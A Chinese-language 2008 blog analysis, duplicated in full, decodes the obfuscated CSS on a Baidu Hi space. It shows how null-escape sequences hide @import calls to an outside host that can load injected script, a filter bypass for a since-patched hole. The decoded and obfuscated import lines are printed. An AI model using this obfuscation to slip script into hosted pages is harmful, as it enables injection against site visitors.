解析edikid
互聯(lián)網(wǎng) 發(fā)布時間:2008-10-08 19:04:49 作者:佚名
我要評論

從我發(fā)布百度CSS import漏洞開始,就有人不斷問我關(guān)于http://hi.baidu.com/edikid這個空間,到現(xiàn)在可能有上百人了吧!我曾經(jīng)說過CSS內(nèi)容原則上是不能被加密的——原因就是它需要被瀏覽器解析。但是當(dāng)大家用我的http://dohi.cn/hisearchcss.asp對他的空間CSS進(jìn)行
從我發(fā)布百度CSS import漏洞開始,就有人不斷問我關(guān)于http://hi.baidu.com/edikid這個空間,到現(xiàn)在可能有上百人了吧!我曾經(jīng)說過CSS內(nèi)容原則上是不能被加密的——原因就是它需要被瀏覽器解析。但是當(dāng)大家用我的http://dohi.cn/hisearchcss.asp對他的空間CSS進(jìn)行查看時,看到的是亂碼,似乎他創(chuàng)造了一個奇跡。
這里Monyer不對其本人以及技術(shù)做任何討論或評價,僅僅就他的CSS做一下基本解析,以后大家遇到此問題就不用苦惱了。
先列一下其空間的CSS代碼
以下是代碼片段:
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
說實(shí)話,如果偏讓我對這些代碼說出個所以然來,那是不現(xiàn)實(shí)的,因?yàn)榧词箤τ谀銈兯械臑g覽器來說,其中的大部分代碼都是無效代碼,也就是不管你寫什么,都不會執(zhí)行。
所以里面的
以下是代碼片段:
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
沒有任何意義,你愿意寫什么寫什么,只要保證語句的正常結(jié)束就可以!這也是你不管怎么樣也不會讀懂的原因。細(xì)心的朋友會發(fā)現(xiàn)我提出了其中的兩句代碼,它們是:
@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";
@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";
在CSS里“\0”、“\00”、“\000”是會被瀏覽器忽略的(其他的相關(guān)的CSS hacking 請參考Monyer的XSS系列),那我們?nèi)サ艨纯矗?br /> @import "http://blog.edikid.net/hibaidu/css.html";
@import http://blog.edikid.net/hibaidu/js.html;
對于這兩句,我想大家再熟悉不過了吧?其中不僅可以放被調(diào)用的CSS代碼,同時也可以隨意插入js代碼(我們不是用它插過視頻么?)
但是我們把作者的所有CSS全部copy到我們那里是不會成功的,原因就是import字符及相關(guān)繞過方式早已經(jīng)被百度過濾了,而作者是在百度過濾之前加入的,并且沒有修改過,所以仍然有效。
對于
http://blog.edikid.net/hibaidu/css.html
http://blog.edikid.net/hibaidu/js.html
第一個CSS調(diào)用我沒有分析,因?yàn)槲覝y試時恰好文件無法訪問(第二個應(yīng)該不會被執(zhí)行,因?yàn)榍懊娴幕煜Z句不是很完整,這個要看你客戶端是什么瀏覽器了)。
但是以前一次分析時好像記得其中有類似
這樣的html轉(zhuǎn)向代碼。由于后綴名的關(guān)系,當(dāng)你用瀏覽器直接訪問時,里面的CSS不會被執(zhí)行,但會執(zhí)行嵌入其中的html或js代碼;當(dāng)你用import調(diào)用時,里面的html及腳本不會執(zhí)行,但里面的CSS會執(zhí)行。所以你只能用記事本來打開,或flashget下載。
其實(shí)說了這么多,我們無非是在CSS上打轉(zhuǎn),如果真正地了解什么是CSS,并切身實(shí)地地去思考,我相信就不會有那么多問題出現(xiàn)了。
這里Monyer不對其本人以及技術(shù)做任何討論或評價,僅僅就他的CSS做一下基本解析,以后大家遇到此問題就不用苦惱了。
先列一下其空間的CSS代碼
以下是代碼片段:
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
說實(shí)話,如果偏讓我對這些代碼說出個所以然來,那是不現(xiàn)實(shí)的,因?yàn)榧词箤τ谀銈兯械臑g覽器來說,其中的大部分代碼都是無效代碼,也就是不管你寫什么,都不會執(zhí)行。
所以里面的
以下是代碼片段:
@ODY{
@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} #HEADER%7@@ACKGROUND:#CCFF66%3@HEIGHT:100PX%3@WIDTH:100%} AD1,AD2,AD3,AD4,AD5,AD6%7@@ACKGROUND:#FFCC00%3@COLOR:#2FA4D}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ SCROLL@AR-DARKSHADOW-COLOR: #FFFFFF%3@ SCROLL@AR-@ASE-COLOR: #FFFFFF%3@;}
E%3@} #LAYOUT%7@WIDTH:98%%3@} #LAYOUT TD.C3T1%-ARROW-COLOR: #000000%3@ SCROLL@AR-TRACK-COLOR: #FFFFFF%3@ SCROLL@AR-DARKSHADOW@ODY%7@@ACKGROUND:#FFCC00%3@WIDTH:100%%3@OVERFLOW-X:HIDDEN%3@COLOR:#2FA4DE} %%3@ %
沒有任何意義,你愿意寫什么寫什么,只要保證語句的正常結(jié)束就可以!這也是你不管怎么樣也不會讀懂的原因。細(xì)心的朋友會發(fā)現(xiàn)我提出了其中的兩句代碼,它們是:
@\0i\0m\0p\0o\0r\000t "\0h\0t\0t\0p://bl\0o\0g\0.ed\0i\0k\0id.ne\0t\0/\0h\0ibaidu/c\0s\0s.\0h\0t\0m\0l\0";
@\0i\0m\0p\0o\0r\00t "h\0t\0t\000p:/\0/\0b\0l\0o\0g.e\0d\0i\0k\0i\0d.n\0e\0t\0/\0h\0i\0b\0a\0idu\0/\000js.h\0t\0m\0l";
在CSS里“\0”、“\00”、“\000”是會被瀏覽器忽略的(其他的相關(guān)的CSS hacking 請參考Monyer的XSS系列),那我們?nèi)サ艨纯矗?br /> @import "http://blog.edikid.net/hibaidu/css.html";
@import http://blog.edikid.net/hibaidu/js.html;
對于這兩句,我想大家再熟悉不過了吧?其中不僅可以放被調(diào)用的CSS代碼,同時也可以隨意插入js代碼(我們不是用它插過視頻么?)
但是我們把作者的所有CSS全部copy到我們那里是不會成功的,原因就是import字符及相關(guān)繞過方式早已經(jīng)被百度過濾了,而作者是在百度過濾之前加入的,并且沒有修改過,所以仍然有效。
對于
http://blog.edikid.net/hibaidu/css.html
http://blog.edikid.net/hibaidu/js.html
第一個CSS調(diào)用我沒有分析,因?yàn)槲覝y試時恰好文件無法訪問(第二個應(yīng)該不會被執(zhí)行,因?yàn)榍懊娴幕煜Z句不是很完整,這個要看你客戶端是什么瀏覽器了)。
但是以前一次分析時好像記得其中有類似
這樣的html轉(zhuǎn)向代碼。由于后綴名的關(guān)系,當(dāng)你用瀏覽器直接訪問時,里面的CSS不會被執(zhí)行,但會執(zhí)行嵌入其中的html或js代碼;當(dāng)你用import調(diào)用時,里面的html及腳本不會執(zhí)行,但里面的CSS會執(zhí)行。所以你只能用記事本來打開,或flashget下載。
其實(shí)說了這么多,我們無非是在CSS上打轉(zhuǎn),如果真正地了解什么是CSS,并切身實(shí)地地去思考,我相信就不會有那么多問題出現(xiàn)了。
相關(guān)文章
- “CMOS密碼”就是通常所說的“開機(jī)密碼”,主要是為了防止別人使用自已的計(jì)算機(jī),設(shè)置的一個屏障2023-08-01
QQScreenShot之逆向并提取QQ截圖--OCR和其他功能
上一篇文章逆向并提取QQ截圖沒有提取OCR功能, 再次逆向我發(fā)現(xiàn)是可以本地調(diào)用QQ的OCR的,但翻譯按鈕確實(shí)沒啥用, 于是Patch了翻譯按鈕事件, 改為了將截圖用百度以圖搜圖搜索.2023-02-04- QQ截圖是我用過的最好用的截圖工具, 由于基本不在電腦上登QQ了, 于是就想將其提取出獨(dú)立版目前除了屏幕錄制功能其他都逆出來了, 在此分享一下2023-02-04
非系統(tǒng)分區(qū)使用BitLocker加密導(dǎo)致軟件無法安裝的解決方法
很多電腦用戶在考慮自己電腦磁盤分區(qū)安全時會采用 Windows 自帶的 BitLocker 加密工具對電腦磁盤分區(qū)進(jìn)行加密。但有些人加密后就會忘記自己設(shè)置的密碼從而導(dǎo)致在安裝其它軟2020-11-25防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生
這篇文章為大家詳細(xì)介紹了如何才能防止離職員工帶走客戶、防止內(nèi)部員工泄密、避免華為員工泄密事件的發(fā)生,具有一定的參考價值,感興趣的小伙伴們可以參考一下2017-06-27徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、涉密人員離崗離職前防范舉
近些年企業(yè)商業(yè)機(jī)密泄漏的事件屢有發(fā)生,這篇文章主要教大家如何徹底防止計(jì)算機(jī)泄密、重要涉密人員離職泄密、告訴大家涉密人員離崗離職前的防范舉措,具有一定的參考價值,2017-06-27量子計(jì)算機(jī)輕松破解加密算法 如何破解加密算法?
最近有電腦用戶反應(yīng)量子計(jì)算機(jī)可以破解下載的所有的加密算法嗎?其實(shí)也不是不可以,下面虛擬就為大家講解買臺量子計(jì)算機(jī),如何分分鐘破解加密算法2016-09-26怎么破解Webshell密碼 Burpsuite破解Webshell密碼圖文教程
webshell是以asp、php、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,一種網(wǎng)頁后門。黑客通常會通過它控制別人網(wǎng)絡(luò)服務(wù)器,那么怎么破解webshell密碼呢?一起來看看吧2016-09-19- 本文討論了針對Linux系統(tǒng)全盤加密的冷啟動攻擊,大家都認(rèn)為這種攻擊是可行的,但執(zhí)行這么一次攻擊有多難?攻擊的可行性有多少呢?需要的朋友可以參考下2015-12-28
防止泄露公司機(jī)密、企業(yè)數(shù)據(jù)防泄密軟件排名、電腦文件加密軟件排行
面對日漸嚴(yán)重的內(nèi)部泄密事件,我們?nèi)绾问刈o(hù)企業(yè)的核心信息,如何防止內(nèi)部泄密也就成了擺在各個企業(yè)領(lǐng)導(dǎo)面前的一大問題。其實(shí),針對內(nèi)網(wǎng)安全,防止內(nèi)部信息泄漏早已有了比較2015-12-17